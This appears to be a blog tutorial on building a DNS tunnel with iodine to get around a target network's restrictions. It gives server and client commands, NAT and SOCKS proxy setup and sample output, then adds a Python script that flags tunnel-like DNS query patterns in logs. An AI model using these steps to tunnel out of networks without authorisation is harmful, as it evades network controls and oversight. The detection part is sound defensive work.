DNS Tunneling with iodine (part 2)

2 03 2014

In my previous article I described how to exploit a covert channel such as DNS tunneling, using iodine together with a DNS server under our control.

Here I describe how to set up a DNS tunnel without a controlled DNS server of our own: the tunnel runs directly between the iodine client and the iodined server, which is a technically easier scenario to exploit than the one in the previous article.

Let's assume we are physically connected to a target network. In order to exploit DNS tunneling we have to verify that we can run DNS queries against an arbitrary DNS server, that is, a DNS server not included in the target network's default configuration (e.g. OpenDNS, 208.67.222.222).

We use nslookup to verify this: at the nslookup prompt (>) type server 208.67.222.222, then run a query. If the query is successful, we can exploit a DNS tunnel.

What we need is a server with a public IP (e.g. 11.11.11.11) that we can reach. On that server, install the iodine server (i.e. iodined), then run:

iodined -fP mypassword 10.100.100.1 myexample.com

then enable IP forwarding in the kernel:

echo 1 > /proc/sys/net/ipv4/ip_forward

and add the iptables NAT rule for the tunnel subnet (the one iodined was started with):

iptables -t nat -A POSTROUTING -s 10.100.100.0/24 -o eth0 -j MASQUERADE

Now turn your server into a SOCKS proxy server. You can do it by typing:

ssh -N -D 0.0.0.0:1080 localhost

Now your server is ready.

You should now configure the client. Type:

iodine -fP mypassword -r 11.11.11.11 myexample.com

If it is working, you should see something like:

Opened dns0
Opened UDP socket
Sending DNS queries for myexample.com to 11.11.11.11
Autodetecting DNS query type (use -T to override).
Using DNS type NULL queries
Version ok, both using protocol v 0x00000502. You are user #0
Setting IP of dns0 to 10.100.100.2
Setting MTU of dns0 to 1130
Server tunnel IP is 10.100.100.1
Skipping raw mode
Using EDNS0 extension
Switching upstream to codec Base128
Server switched upstream to codec Base128
No alternative downstream codec available, using default (Raw)
Switching to lazy mode for low-latency
Server switched to lazy mode
Autoprobing max downstream fragment size... (skip with -m fragsize)
...768 not ok.. 384 ok.. 576 ok.. 672 ok.. 720 ok.. ...744 not ok.. 732 ok.. will use 732-2=730
Setting downstream fragment size to max 730...
Connection setup complete, transmitting data.

The tunnel is ready. Ping 10.100.100.1 to verify the connection, then set up the SOCKS5 proxy settings in your browser: IP 10.100.100.1, port 1080.

You should now be browsing the internet.
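From the defender's side, the client output above also gives away the tunnel's fingerprint: a burst of queries for long, random-looking labels under a single zone, using the NULL record type (iodine's default when autodetection succeeds). The following Python script is an added example, not code from the original post or from the iodine project: it scores constructed DNS query log lines (the log format and the last-two-labels zone heuristic are assumptions) per zone and flags zones that match that pattern.

```python
import re
from collections import defaultdict

# Constructed sample query log (not a real capture), one query per line:
# "<time> <client-ip> <qname> <qtype>"
SAMPLE_LOG = """\
10:00:01 192.168.1.20 www.example.org A
10:00:02 192.168.1.20 vaaaakardli1pf7c3iubbbbpbb3jk0ytjj3jlqx4eaj5z.myexample.com NULL
10:00:02 192.168.1.20 vab4g2xkcp2u9tvqfgdgvhxgbmeo5s1gjjdnrl8yxa0wq.myexample.com NULL
10:00:03 192.168.1.20 vacr6dpzu3dl4fkb8dchb0uaqrc2jo0igdjpi14cjhq.myexample.com NULL
10:00:03 192.168.1.20 vad8rkn7jrd1swdoy3xgenwv9wjfgczgrzijdhy2qwr.myexample.com NULL
10:00:04 192.168.1.21 mail.example.org MX
10:00:05 192.168.1.20 vae0ahjt1fvbyy0fpsi4cpvduh57b6n1cmd0sqp9jx.myexample.com NULL
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+)$")
LONG_LABEL = 30  # single labels this long are rare outside CDNs and tunnels


def base_domain(qname):
    """Crude zone guess: the last two labels (assumption; use a public-suffix
    list in production)."""
    return ".".join(qname.rstrip(".").split(".")[-2:])


def analyze(log_text, min_queries=3):
    """Aggregate queries per zone and flag zones that look like an iodine tunnel:
    enough volume plus NULL-type queries or consistently long labels."""
    zones = defaultdict(lambda: {"queries": 0, "null_queries": 0,
                                 "label_lens": [], "clients": set()})
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip malformed lines rather than crash on them
        _, client, qname, qtype = m.groups()
        z = zones[base_domain(qname)]
        z["queries"] += 1
        z["clients"].add(client)
        if qtype == "NULL":
            z["null_queries"] += 1
        z["label_lens"].append(max(len(label) for label in qname.split(".")))
    report = {}
    for zone, z in zones.items():
        avg_label = sum(z["label_lens"]) / len(z["label_lens"])
        report[zone] = {
            "queries": z["queries"],
            "null_queries": z["null_queries"],
            "clients": sorted(z["clients"]),
            "avg_longest_label": round(avg_label, 1),
            "suspicious": z["queries"] >= min_queries
                          and (z["null_queries"] > 0 or avg_label > LONG_LABEL),
        }
    return report
```

Run analyze(SAMPLE_LOG) to see myexample.com flagged while example.org is not; in a real deployment the thresholds should be tuned against a baseline of the network's normal DNS traffic.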
